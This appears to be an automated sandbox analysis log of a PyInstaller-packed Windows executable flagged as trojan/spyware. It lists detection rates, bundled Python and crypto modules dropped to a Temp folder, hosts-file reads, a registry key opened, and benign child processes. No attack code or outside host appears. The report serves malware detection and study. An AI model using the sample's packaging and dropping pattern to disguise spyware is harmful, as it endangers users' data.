Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012728300_2_00007FF701272830
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012767440_2_00007FF701276744
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012850CC0_2_00007FF7012850CC
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF70127D0C80_2_00007FF70127D0C8
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012680D00_2_00007FF7012680D0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF70127D7480_2_00007FF70127D748
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701274F800_2_00007FF701274F80
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701276FC80_2_00007FF701276FC8
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701270FE40_2_00007FF701270FE4
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: String function: 00007FF701262770 appears 41 times
Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: KzqQe0QtRd.exe, 00000000.00000003.209846231.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.211083980.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209951342.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209421575.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209811582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.212280347.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.212170582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209677396.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209566729.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209890928.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209196811.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209248171.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.211275878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209613878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.212514021.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209763072.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209296479.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs KzqQe0QtRd.exe
Source: KzqQe0QtRd.exe, 00000000.00000003.209490690.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs KzqQe0QtRd.exe
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeSection loaded: python3.dllJump to behavior
Source: KzqQe0QtRd.exeReversingLabs: Detection: 41%
Source: KzqQe0QtRd.exeVirustotal: Detection: 21%
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile read: C:\Users\user\Desktop\KzqQe0QtRd.exeJump to behavior
Source: KzqQe0QtRd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exe
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeProcess created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exe
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeProcess created: C:\Users\user\Desktop\KzqQe0QtRd.exe C:\Users\user\Desktop\KzqQe0QtRd.exeJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user~1\AppData\Local\Temp\_MEI67202Jump to behavior
Source: classification engineClassification label: mal72.troj.spyw.winEXE@6/80@14/8
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012674E0 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7012674E0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: KzqQe0QtRd.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: KzqQe0QtRd.exeStatic file information: File size 14042365 > 1048576
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KzqQe0QtRd.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: KzqQe0QtRd.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: KzqQe0QtRd.exe, 00000000.00000003.212170582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: KzqQe0QtRd.exe, 00000000.00000003.212514021.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209566729.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: KzqQe0QtRd.exe, 00000000.00000003.209613878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209248171.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209811582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209613878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209763072.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209296479.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209196811.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: KzqQe0QtRd.exe, 00000000.00000003.209196811.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209846231.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: KzqQe0QtRd.exe, 00000000.00000003.209677396.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp
Source: KzqQe0QtRd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KzqQe0QtRd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KzqQe0QtRd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KzqQe0QtRd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KzqQe0QtRd.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: KzqQe0QtRd.exeStatic PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
Source: python311.dll.0.drStatic PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.0.drStatic PE information: 0xC94BF788 [Wed Jan 6 22:49:44 2077 UTC]
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-3.dllJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701263E10 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF701263E10
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701267850 FindFirstFileExW,FindClose,0_2_00007FF701267850
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701276744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF701276744
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012809E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7012809E4
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701276744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF701276744
